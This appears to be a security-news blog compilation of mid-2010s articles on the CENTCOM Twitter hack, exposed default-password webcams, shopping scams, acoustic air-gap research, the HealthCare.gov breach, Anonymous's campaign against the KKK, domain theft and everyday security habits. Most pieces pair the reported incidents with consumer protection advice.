Events suddenly took a strange turn, FBI is now using information obtained by hacktivist group Anonymous to help it find the hackers who compromised the Centcom Twitter account and YouTube channel for about 30 minutes and tarnished them with ISIS messages and threats against US soldiers. On January 13, just as President Barack Obama was speaking on cyber security & outlining the new cyber-security measures, the hackers compromised Centcom accounts. The hackers also claimed to have compromised officials’ mobile devices but the US Army confirmed that the hackers had access only to social media account and nothing else and they haven’t used the accounts to spread any sort of malicious code either. “CENTCOM’s operational military networks were not compromised and there was no operational impact to U.S. Central Command. CENTCOM will restore service to its Twitter and YouTube accounts as quickly as possible. We are viewing this purely as a case of cyber vandalism,” reads the statement issued by the CENTCOM. It was first believed that a Twitter account named CyberCaliphate- the hacking wing of ISIS was behind the attack, however Anonymous Hacktivists claimed that the attacks actually came from inside US, from the state of Maryland and not the Middle East. The group commented that it didn’t appear that the hackers were using proxies to hide their original location. The group traced the IP addresses of the hackers and narrowed it down to 11 IP-addresses which were used in the attacks. The @TheAnonMessage even audaciously tweeted to the official FBI Twitter account to inform them of the information, adding “You’re welcome” in their tweet. Seemingly, FBI took notice of their tweets as on January 16 a memo from the Federal Bureau forwarded the IP addresses to many security experts to verify the credibility of the information with the help of the data which was in possession of those experts. The memo reads: “On 12 January 2015, at 2:01PM CST, @TheAnonMessage, a Twitter account associated with the Anonymous hacking group, tweeted 11 IP addresses involved with the CENTCOM hack with the message. The FBI is providing a list of IPs obtained from @TheAnonMessage Twitter Account, and encourages recipients to examine their networks for any activity related to these IP addresses.” In the past the FBI has tracked and arrested multiple members of the Anonymous hacktivists group including the Americans, Barrett Brown for plotting the overthrow of the US government, and Jeremy Hammond for hacking servers of Statfor, a private intelligence company, and leaking its information to anti-secrecy site- WikiLeaks, as well as several members of the LulzSec offshoot in the UK. Surprisingly the Federal Bureau of Investigation has also worked with the same group in 2012 when they carried out several cyberattacks on corporate and government websites in Brazil to help the FBI carry out their biggest cybercrime investigations. The @TheAnonMessage erringly identified a police officer as the killer of Mike Brown in August, 2014 too. Even so, subsequently the account suggested that they intentionally named the wrong person to force the police to reveal Darren Wilson’s identity.

Track your friends with this Facebook Hack


How would you feel like if your fantasy world of Harry Potter is comes live in front of your eyes. Harry Porter reminds you of Marauder’s Map which used to tell whereabouts of Characters as they roam in classrooms and in corridors of Hogwarts School. You can find Marauder’s Map live and installed in your systems in a form of chrome Extension, The extension is developed by a Student. What does this Extension for you? This extension lets you watch each and every step of your friends on Facebook as they fetch their location and data from messenger and plot them according to their location on map. You know about the Facebook location feature on Facebook but still in doubt about the accuracy and easiness of data extracting.
Facebook always promote their Users to use location sharing and enable their location while active on messenger when users install IOS and Android version of Facebook. For displaying location Maraunder’s Map gets loaded and location is tracked from the messages sent over messenger as developed by Aran Khanna. For further clarification on tracking location, this extension will map your location only when you have conversations that are location enabled with your Facebook friends. The location revelations is not your fault, Facebook has enabled this location sharing feature you might or might not sharing your location with others. Location information can be easily used by Facebook users as they can easily track as they click through the chat option. To safe your vulnerable location information then keep your location disabled and location data private. You can keep your location settings private by tapping arrow icon present on messenger. Or if you can’t do anything disable Messenger’s access to your location from your general settings.

73,000 Webcams Are Open to Peeping Toms -- Is Yours?


If the past year has taught consumers anything, it's that identity thieves, fraudsters and scammers are on the prowl, going after any information they can use to make a buck. But the intrusions don't stop there. If the thought of being the unwitting star of your own prime time reality show gives you the willies, consider the recent revelation that more than 73,000 unsecured webcams and surveillance cameras are, as I write this column, viewable on a Russian-based website. The site lists the cameras by country. (Unfortunately, the U.S. is well represented.) In every case, victims ignored safety protocols and installed the cameras with their default login and password -- admin/admin or another easy-to-guess combination findable on any number of public-facing websites. According to NetworkWorld: There are 40,746 pages of unsecured cameras just in the first 10 country listings: 11,046 in the U.S.; 6,536 in South Korea; 4,770 in China; 3,359 in Mexico; 3,285 in France; 2,870 in Italy; 2,422 in the U.K.; 2,268 in the Netherlands; 2,220 in Colombia; and 1,970 in India. Like the site said, you can see into 'bedrooms of all countries of the world'. There are 256 countries listed plus one directory not sorted into country categories. Why It Matters You may remember the sextortionist who hacked into Miss Teen USA's computer camera and took compromising photographs. He tried to get money in exchange for not distributing the pictures, and got 18 months behind bars instead. That's a bit too lenient in my book. Unfortunately, there are thousands more slimeballs where this guy came from who are poking around, looking for ways to exploit the private moments of your life for their personal amusement or gain. The Internet of Things has arrived making homes smart, fitness totally interactive and tasks infinitely easier, but the devices we buy to streamline day-to-day life create vulnerabilities that, when exploited, could bring your day to a screeching halt, and the risks are much higher if you don't apply common sense during the setup of these password-protected devices. The rule here couldn't be simpler: Anything that hooks into a network must be locked down. Don't think it will happen to you? Consider this: There are websites that list the default passwords of all kinds of devices. If you have something wireless that's hooking up to your household router, it likely came with a pre-set password and login. And there's a good chance, whatever the device, there's a forum online where it's been figured out, hacked, cracked and hijacked for all stripe of nefarious purpose. Convenient ... for Everyone The added convenience provided by the Internet of Things is obvious, but the security issues may not be. Are your fitness records hackable by a third party? Are they linked to social media? How much information did that require? A login? A password? And what's to stop a hacker from opening your front door or turning off your heat during a blizzard or your lights during a home invasion: all with an app? Other common devices that are password protected should immediately come to mind here. Whether it is your household printer, your wireless router or your DVR, there are folks out there who are curious about you, not because they value you as a human being, but because they can create value from any plugged-in human -- whether by fraud or extortion or (in a more old-fashioned mode) getting the information they need to rob you blind when you're not home. The number of people who don't change default passwords is staggering, as evidenced by the 73,000 wide-open webcams on that Russian website. There's a major disconnect here, and it's specific to the Internet of Things. On the Internet proper, it seems the message has finally seeped in and people are beginning to make themselves harder targets -- making sure their privacy settings are tight and their passwords are both strong and changed frequently. But when it comes the Internet of Things, there is still more learning to be done -- hopefully not Miss Teen USA-style. The solution, for this particular problem, is remarkably simple: Set a long and strong password on all devices. Whatever it is, it's your job to pick something easy for you to remember and hard for others to guess. The Bigger Problem The Pew Research Center released a statistic this month that showed 90% of Americans believe they have no control over their personal information -- that the facts and figures and ciphers unique to them are simply in too many places, and essentially that the data cat's out of the bag. Breaches have crossed the Rubicam. Whether they are of the unavoidable variety or the product of carelessness, they will continue to happen apace. Now the third certainty in life, breaches have become the potholes on a bumpy road. What no one wants to deal with is the fact that the road ends abruptly -- jagged concrete and rebar sticking out -- and there's nothing but air after that, and a whole lot of it, between you and the endless crimes that can be committed against you.

Five Ways You'll Be Hacked on Cyber Monday


According to a June 2014 study by the Center for Strategic and International Studies, the likely annual cost to the global economy from cybercrime could reach $575 billion. It's a big number. Here are five ways hackers will try to get you to contribute to it while you enthusiastically search for the best deals on Black Friday and Cyber Monday. Hack #1 -- Social Engineering - the process of manipulating people to give up private information. Some of the most well publicized hacks in recent memory have been socially engineered. What's more likely... Apple's iCloud being hacked or someone (such as Kate Upton or Jennifer Lawrence) being tricked or willingly "lending" their password to someone? If you are checking out on an obscure website this Cyber Monday and the site asks you to "confirm" the last four digits of your social security number, you're about to be hacked. No commerce site needs your social security number, not even the last four digits. The request will look innocuous, you'll be busy getting a deal on that awesome pair of rare Nike kicks, and you'll be one step closer to having your credit card spoofed or worse. Countermeasures -- Don't give up more information than is absolutely necessary. Hack #2 -- Phishing - the act of defrauding an online account holder of financial information by posing as a legitimate company. Got an email from Amazan.com? Yeah, that's not Amazon. Look closely. Thanksgiving is one of the heaviest phishing days of the year, because fewer people paid to protect you from phishing attacks are working. Phishing attacks are actually 336% more common on Thanksgiving, meaning you're far more likely to receive a suspicious email in your inbox on Cyber Monday. There's a reason Gmail sent that email to your Spam folder. Leave it there. If you didn't ask for it, don't click on it! There's no reason to give out your financial info because a scammer decided to send you a halfway decent-looking email. Countermeasures -- Carefully, carefully, carefully check who emails are from. If you're not sure about a sender, it's best to avoid that email and deal. Hack #3 -- "Scammer Grammar" and General Scamming Behavior - If a website features many misspellings and grammatical errors, be wary. No company that genuinely wants your business will rush to put up a listing that looks like it was typed by a third grader. Beware of sites that require payment via wire transfer, or that require you to act immediately to secure the product. Consumer Affairs says, "Beware of 'act now' offers that tell you the seller is a soldier needing cash for possessions before deploying to a war zone or a recent divorcee wanting to unload her former husband's belongings. These tactics are often bait to empty your wallet. Most of the time the items don't even exist." Another big scam is the auction follow-up email hack. If you miss out on an auction or timed deal, ignore follow-up emails with the same offer. Scammers love to track auction sites and contact losing bidders to direct them away from secure buying environments. If you lose an item, move on to another auction. Countermeasures -- Don't shop on sites that look like they were designed by practitioners of phonetic writing or sites that would have looked awesome in 2004. Hack #4 -- Fake Black Friday Ads - Inauthentic Black Friday ads re-direct you to places you shouldn't be, or may install malware/unwanted software on your computer. Everyone's looking for the best deals, so cyber criminals love to release fake Black Friday ads that trick you into visiting sites you otherwise wouldn't visit. If you want to find great Cyber Monday deals, go directly to reputable websites, whether they're vendors (Best Buy, Amazon, Walmart) or trusted third-party aggregators (BFAds.net). To protect yourself against phony ads, don't change up your browsing habits from the rest of the year. Go directly to websites instead of through Google. Walmart isn't selling a 60" HDTV for $97. If, by some miracle, that's a real sale, you better believe it's going to be front and center on Walmart.com.Countermeasures -- Don't search for phrases like "best Cyber Monday deals." Don't go to websites you've never heard of.Hack #5 -- Site Swap - Ambitious scammers build entire fake sites that look shockingly similar to popular retailers. This is a more complicated hack, and sometimes the most convincing - so pay attention. You will almost always get to a fake site through a search engine or a mistyped URL. But sometimes fake sites are used in combination with email hacks. The most sophisticated versions are single pages that actually link to the real sites so the information request looks more legitimate. If you're not sure about a link, there are a few great resources at your disposal. Sites like getlinkinfo.org or wheredoesthislinkgo.com will show you exactly where a suspicious link goes. Still not sure? It's probably fake. Move on. The chance of landing a great deal is not worth credit card fraud or a credit score hit. Countermeasures -- Go directly to retailers' sites, rather than through search engines. Don't click on links from any email you can't verify. Sufficiently armed with countermeasures? I hope so. This should be a wonderful holiday season for consumers and retailers alike. There are great deals to be had on Ultra HD sets (they've come down 84% from last year). I've seen amazing deals on phones and tablets, to say nothing of stunning array of wearables on sales this year. Happy Thanksgiving from all of us at shellypalmer.com - practice safe computing and enjoy the holiday.

Your Computer Could Be Hacked Using Only Sound


Is your computer audio-enabled? That might be enough to get it hacked, according to recent findings from German researchers with the Fraunhofer Institute for Communication, Information Processing, and Ergonomics. As revealed in a paper for the Journal of Communications, the researchers successfully hacked computers using nothing but sound. Before you start worrying about your own machine, take a second to pity anyone you know in the computer security industry. The most secure computers in the world are completely isolated from other machines -- protected by "air gaps," with no Internet connection, no shared phone lines, nothing. Conventional wisdom goes that such computers are impossible to hack unless the hacker has direct, physical access to the machine. Or at least that was the conventional wisdom prior to the German discovery. The Fraunhofer researchers started researching audio hacks after considering how malicious hackers might break into these highly secure systems and computers. In their paper's introduction, they note that hackers of the past often used "parts of the operating system that were not considered for communication" to insert malicious data into otherwise highly secure systems. The researchers adopted the mindset of a hacker when designing a sound-only hack for stealing data from deliberately isolated computers. Audible noises could in theory be used to pass data between such computers and the "hacker" computer, but the researchers, wishing to remain as inconspicuous as hackers, instead chose to use sounds at a frequency inaudible to human ears (similar to the noise made by dog whistles). Building upon preexisting technology used to transmit data under water by sound waves, the researchers were able to use the microphone and speakers in an unmodified Lenovo T400 personal computer to transmit small amounts of information -- keystrokes in the test case, though the hack could also transmit encryption keys, small text files and even passwords -- from an isolated computer to a compromised one. The researchers also tested the range of audio hack, and found that on unmodified computers, the method worked for distances up to 65 feet -- a range which can be expanded almost indefinitely with use of special "mesh networks," which can wirelessly transmit audio long distances. The conclusion? According to the study, "acoustical networking as a covert communication technology is a considerable threat to computer security." For high-security computers that require audio, the researchers suggest sound-filtering as a way to block covert acoustical attacks. For everyone else, simply disable your machine's audio.

Thursday, May 28, 2015

Hacker Succeeds In Breaking Into HealthCare.gov For First Time


A hacker broke into HealthCare.gov and installed malicious software on one of its servers in the first successful breach of the health insurance exchange, federal officials said Thursday. No personal data were stolen from the Obamacare site as the hacker accessed only a test server that did not contain consumer information, according to Kevin Griffis, a senior adviser at the Department of Health and Human Services. "Data was not transmitted outside the agency, and the website was not specifically targeted," Griffis said in a statement. "We have taken measures to further strengthen security." A spokesman for the Department of Homeland Security said that agency helped remove malicious software that was designed to launch denial-of-service attacks -- a common tactic used by hackers to flood websites with traffic until they crash. The hacker broke into the server sometime in July, according to The Wall Street Journal, which first reported the breach on Thursday. The malware was discovered on Aug. 25 during a routine security test, federal officials said. The server was guarded by an easy-to-crack default password and the hackers appeared to have installed the malware for use in future cyberattacks against other websites, according to the Journal. The breach of HealthCare.gov marks the latest in a spate of hacking against both major corporations and government agencies. Earlier this week, Home Depot appeared to be the latest retailer to get hacked when a huge cache of credit and debit card data linked to purchases at the store went on sale on a black market website. Last week, JPMorgan said it was investigating a possible cyberattack after reports that hackers stole gigabytes of data, including customer credit and savings account information, from its network. The federal government hasn't fared much better. In July, Chinese hackers broke into the databases of the Office of Personnel Management, which contains files on federal employees, including those who apply for top-secret clearances. After its Oct. 1 debut last year, HealthCare.gov was plagued with problems, including repeated glitches that lasted for weeks and initially prevented millions of people from signing up for health insurance. The site was fixed after the White House hired dozens of engineers and programmers from tech industry giants like Google and Oracle to repair it. More than 8 million people have signed up for insurance via the federal and state health care exchanges, federal officials said in May. The security of the federal website has been an especially sensitive issue given the fierce political battle over Obamacare. Rep. Darrell Issa (R-Calif.), chairman of the House Oversight and Government Reform Committee, has been investigating potential security vulnerabilities in the site. Mitre, a contractor hired to check the site's security, found 28 security flaws in a test last October. Administration officials said last year that those flaws had been fixed or did not pose a threat, according to The Washington Post.

Almost All Of The World's Biggest News Organizations Have Been Targeted By Hackers


SINGAPORE (Reuters) - Twenty-one of the world's top-25 news organizations have been the target of likely state-sponsored hacking attacks, according to research by two Google security engineers. While many internet users face attacks via email designed to steal personal data, journalists were "massively over-represented" among such targets, said Shane Huntley, a security software engineer at Google. The attacks were launched by hackers either working for or in support of a government, and were specifically targeting journalists, Huntley and co-author Morgan Marquis-Boire said in interviews. Their paper was presented at a Black Hat hackers conference in Singapore on Friday. "If you're a journalist or a journalistic organization we will see state-sponsored targeting and we see it happening regardless of region, we see it from all over the world both from where the targets are and where the targets are from," Huntley told Reuters. Both researchers declined to go into detail about how Google monitors such attacks, but said it "tracks the state actors that attack our users." Recipients of such emails in Google's Gmail service typically receive a warning message. Security researcher Ashkan Soltani said in an earlier Twitter post that nine of the top-25 news websites use Google for hosted email services. The list is based on traffic volumes measured by Alexa, a web information firm owned by Amazon.com Inc. California-headquartered Google also owns VirusTotal, a website that analyses files and websites to check for malicious content. "TIP OF THE ICEBERG" Several U.S. news organizations have said they have been hacked in the past year, and Forbes, the Financial Times and the New York Times have all succumbed to attacks by the Syrian Electronic Army, a group of pro-government hackers. Huntley said Chinese hackers recently gained access to a major Western news organization, which he declined to identify, via a fake questionnaire emailed to staff. Most such attacks involve carefully crafted emails carrying malware or directing users to a website crafted to trick them into giving up credentials. Marquis-Boire said that while such attacks were nothing new, their research showed that the number of attacks on media organizations and journalists that went unreported was significantly higher than those made public. "This is the tip of the iceberg," he said, noting a year-long spate of attacks on journalists and others interested in human rights in Vietnam, including an Associated Press reporter. The attacks usually involved sending the target an infected email attachment masquerading as a human rights document. While many of the world's biggest media players have been targeted in these attacks, small news organizations, citizen journalists and bloggers were also targeted, Huntley said, noting hacking attacks on journalists in Morocco and Ethiopia. The problem, Marquis-Boire said, was that news organizations have been slower than other businesses in recognizing the threat and taking action. "A lot of news organizations are just waking up to this," he said. Many journalists are now taking individual action to protect their computers and email accounts, he said. "We're seeing a definite upswing of individual journalists who recognize this is important."

Anonymous Is Going To War With The KKK Over Ferguson Protests


WASHINGTON -- Members of the hacker collective Anonymous are targeting the Ku Klux Klan after the designated hate group reportedly threatened protesters in Ferguson, Missouri. The hackers claim to have seized two KKK Twitter accounts and say that they have launched denial-of-service attacks against a number of white supremacist websites affiliated with the Klan. The group has also publicized personal information allegedly belonging to KKK members. “We want the KKK gone, forever,” a person going by the username “SiX” told The Huffington Post on Monday in an Anonymous Internet Relay Chat about the operation. “Don’t worry, we know what we’re doing.” The latest campaign, #OpKKK, began on or around Friday, after the KKK’s Missouri chapter reportedly threatened to use “lethal force” against people protesting the killing of unarmed teenager Michael Brown by a policeman in Ferguson. Tensions in the Missouri town have escalated in recent days as protesters await a grand jury's decision about whether or not to indict the police officer, Darren Wilson. On Sunday, Anonymous members claimed to have taken over a Twitter account, @KuKluxKlanUSA, which they said was run by an official Klan member. They also said they had taken down various websites associated with the hate group, some of which were still down as of Monday. ZDNet, an information technology site, reported Monday that Anonymous was claiming to have hacked another Twitter account, @YourKKKCentral, purportedly belonging to the group. In addition, members of Anonymous have been publicly posting social media accounts, photos and other personal information allegedly belonging to KKK members. The hackers have posted the information on Twitter, under the hashtag #HoodsOff, as well on the website Pastebin.com. A Twitter user going by the name @AnonyOps said, “I heard three cops got outed. Their twitter was stolen ;)” On Sunday night, some members were scheming on the operation’s chat room about how to send pizzas to a white supremacist’s house. Gabriella Coleman, a professor at McGill University who recently authored the book Hacker, Hoaxer, Whistleblower, Spy: The Many Faces of Anonymous, said the operation appears to have been started by a sub-faction of Anonymous’ ongoing “Operation Ferguson” campaign. That campaign began in August as, in part, an effort to publicly name the police officer who shot Brown. #OpKKK, Coleman added, has help from Latin American and Australian members of Anonymous. In the chat with HuffPost, a person going by the name “Anoniter” said Anonymous' members are cross-referencing “all instances of membership to ascertain true identity ... We use basic information that they provide on their site. We then cross it with other online applications to pinpoint exactly who they are." “We ensure that no innocent person would be ousted," Anoniter added. The group hasn’t always correctly identified its targets in the past. Earlier this year, as part of Operation Ferguson, a member of the hacker group mistakenly outed a Ferguson cop who was not responsible for the shooting. The officer soon received hundreds of death threats. A person using the name “anonpanda” pointed out that the KKK was “an easy target to pick on, cuz we kinda get the moral high ground.” The user said, "i could not give a bother about the KKK... i am norwegian, they dont bother me." “i just want to blow out some steam," anonpanda added. Thomas Robb, the national director of the Knights of the Klu Klux Klan, told HuffPost that he’d had threats against his website, but as of Monday, it was still running. He pointed out that “our membership is kept on computers that don’t have access to the Internet.”

How To Protect Yourself From Domain Thieves


Most of us are aware that hackers can steal our financial information. But few people realize that hackers can also go after other valuable property online, like web addresses. Short, catchy URLs can be worth millions of dollars, making them prime targets for thieves. On Monday, The Huffington Post reported on domain theft, a scheme in which hackers steal valuable Internet addresses and sell them in online forums or extort their rightful owners. If a hacker steals your domain name, there’s often little you can do to get it back. But how do you protect your website from getting hijacked in the first place? BE SKEPTICAL OF EMAILS Start by questioning emails that claim to come from a domain registrar like GoDaddy. Hackers often steal website addresses by sending fake emails to their owners. The bogus emails include malicious software that allows thieves to gain control of their victims’ email accounts and approve the transfer of their domain names. The bogus email might say: “Urgent attention! We believe your account has been compromised and payment method is no longer valid. Please log in and correct information,” according to Dave Piscitello, a senior security technologist for ICANN, a California-based nonprofit responsible for managing the Internet address system. Once a hacker has control of your email account, the criminal can transfer your website into his or her control, and you might not be able to get it back. TAKE EXTRA SECURITY MEASURES Choose a domain registrar that offers added security features, like GoDaddy's two-step authentication, that make it harder for hackers to break into your domain account. You should also request your domain be placed on “Registrar Lock,” which requires you to "unlock" the domain before you transfer it by logging in to the registrar's website. With the lock in place, a hacker would need access to both your email account and your registrar account. For an extra $8 a year, GoDaddy will also hide your contact information -- including your email address -- from a public list of domain owners known as the “Whois” database. This prevents thieves from knowing how to contact you to send a bogus email, according to the company. For even more security, Web.com offers an extra feature that prevents anyone from transferring a domain name to another account until a company representative has called the account owner on the phone and that person has provided a nine-digit PIN code to prove their identity. However, the added security comes with a hefty price tag -- $1,850 for the first year, and $1,350 for each additional year. KEEP YOUR RECORDS If your domain name is stolen, you’re more likely to recover it quickly if you've kept documents related to the website, such as billing and registration records. Such documents can help in a lawsuit or when the domain registrar investigates the theft. To get your domain back, “you have to demonstrate you've been a victim,” Piscitello said. “Without documentation, your recourse is very limited.”

Security Mistakes You Make Every Day


We all try to go about our days as smoothly as possible, but unfortunately, we live in a world where it seems like there are threats lurking around every corner. Even if you think you're doing things by the book, you are probably making a number of security mistakes every day that could potentially be costly to your identity and your life. Whether you're at home or on the go to work or play, there are critical things you can easily avoid by taking some time to think before acting. Security mistakes you make at home You have an easy-to-guess Wi-Fi password (or none at all). Although it might seem like less of a hassle to employ a simple password or not use one at all, leaving your home network unprotected is inviting trouble. Not only might neighbors without scruples connect to your Wi-Fi and hog the bandwidth you're paying for, but also criminals can easily hack into an unprotected network and steal your information. Additionally, be wary of connecting to unprotected networks in your area. Legally, you shouldn't do this anyway -- it is considered theft to use someone else's private Wi-Fi. But it is also dangerous, as some shady people set up fake networks in hopes people will connect and practically drop their data into their laps. Create a strong password for your Wi-Fi and try to change it on a regular basis. Some people even set up a separate guest network for visitors, which helps to keep your home network secure for members of the household. Your life is documented on social media. The beauty of social media is that it lets us connect with friends and strangers all over the world. Many apps have popped up that let you share every little thing you do, whether it's the restaurants you eat at or the places you visit with your friends. Sharing is wonderful, when it's with friends and family, but if you don't keep a close watch on your privacy settings, you could be sharing all the information someone needs to know in order to steal your identity or rob your house while you're away on vacation. Get a grip on your security settings, and think before you share. You throw bills and other documents straight into the trash. Junk mail is aggravating, but you put yourself at risk when you throw those pre-approved credit card offers directly into the trash. Many small-time thieves are not above dumpster diving, and they can use documents you throw away to steal your identity. The best solution is to invest in a shredder with cross-cut capability and shred any documents you plan to throw out. This will ensure peace of mind because it shreds papers into tiny confetti-like pieces, making it impossible for anyone to piece them back together. Security mistakes you make at the office Your personal life is not left at the office door. We're all guilty of checking our personal email when we're supposed to be working, but if you aren't careful, this could cost you more than just a reprimand. The workplace should be treated as a sacred space, separate from home. You might think there's no harm checking a few personal websites or keeping your own files on your work computer, but a data breach into your office network could result in more than just what the company keeps on file being stolen. Additionally, leaving papers with important information lying around your office puts you at risk. A lot of identity theft is committed by people you know, or those who have access to your home or business. Keep personal paperwork in a locked drawer or filing cabinet or, better yet, take it home. You write passwords down on sticky notes. It can be difficult to remember all of the passwords we use each day, especially since it's now recommended that we make them longer and more challenging. Some offices require mandatory password changes every 30-90 days, and it might be tempting to cut corners by writing down your new password on a sticky note that you affix to your monitor. However, doing this is like leaving a key to your house dangling from a string on your porch. If you have trouble remembering your password, consider more secure manners of storing it, such as in a password manager app or locked file on your mobile device. Security mistakes you make on the go You use public Wi-Fi networks. Sure, it's convenient to connect to the free Wi-Fi in Starbucks or the airport, and you can certainly save on data charges from your carrier by doing so. However, these networks are unsecured and that makes them dangerous. Criminals can connect to these networks and use them as hunting grounds for data to steal from unsuspecting people around them. If you do choose to connect to a public network, take care not to use any apps or websites that deal with personal data -- such as banking or logging in to check on the status of your tax return. Out running errands and really need to check your account balance? Turn off Wi-Fi and use your mobile device's encrypted 3G or 4G network instead; this network is typically more secure than an unsecured, public Wi-Fi connection. Private conversations aren't private in public. While it might be tempting to conduct business or catch up with a friend during your commute or lunch break, these conversations are rarely as private as you might think. Cell phones make it so we can connect with anyone from just about anywhere. It's convenient, but if other people are around not only are you potentially disrupting their peace and quiet, but you are also broadcasting everything you're saying to them. Talking about your weekend plans or providing the receptionist at your doctor's office with personal information, such as your Social Security number, over the phone makes you a potential target for criminals nearby. Make sure you use discretion in public and move to a private space, such as your car, when you must divulge sensitive information.